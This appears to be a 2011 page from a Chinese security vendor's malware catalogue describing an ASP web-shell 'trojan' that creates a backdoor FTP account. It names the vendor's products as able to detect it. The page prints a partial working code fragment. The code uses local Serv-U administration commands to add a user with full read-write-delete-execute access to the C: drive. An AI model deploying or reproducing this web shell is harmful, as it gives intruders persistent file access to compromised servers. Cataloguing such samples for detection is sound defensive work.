生成FTP后门木马

2011-12-26 17:25:31 来源:本站原创,请勿转载 浏览:416
生成FTP后门木马

木马名称:生成FTP后门木马
木马格式:asp
默认密码:
木马作用:快捷的生成一个自定义账户&密码的ftp空间。

运行界面如下:(图片若超出屏幕,请右键另存到本地查看)

总结:用处不是很大的一个木马,因为它需要管理帐号。
防御方法:护卫神入侵防护系统、护卫神云查杀均可查杀 生成FTP后门木马 这个asp网页木马。

生成FTP后门木马代码片段:
<%
   '----------自定义参数开始-----------
 action=Request("action")
    loginuser = "User " & Request.Form("loginuser") & vbCrLf
    loginpass = "Pass " & Request.Form("loginpass") & vbCrLf
 port=Request.Form("port")
    mydomain=Request.Form("mydomain")
 path=Request.Form("path")
    ftpport = Request.Form("ftpport")
    user=Request.Form("user")
    pass=Request.Form("pass")
    cmd= Request.Form("cmd")
    '----------公共变量定义开始-----------------
   
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain="&mydomain&"|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",path)
   
    '----------公共变量定义结束-----------------
 select case action
 case 1
   set a=Server.CreateObject("Microsoft.XMLHTTP")
            a.open "GET", "http://127.0.0.1:" & port & "/"&mydomain&"/upadmin/s1",true, "", ""
            a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
            Response.Write "添加域["&mydomain&"]成功!"
            response.redirect "?action=4"
 case 2

(0)
(0)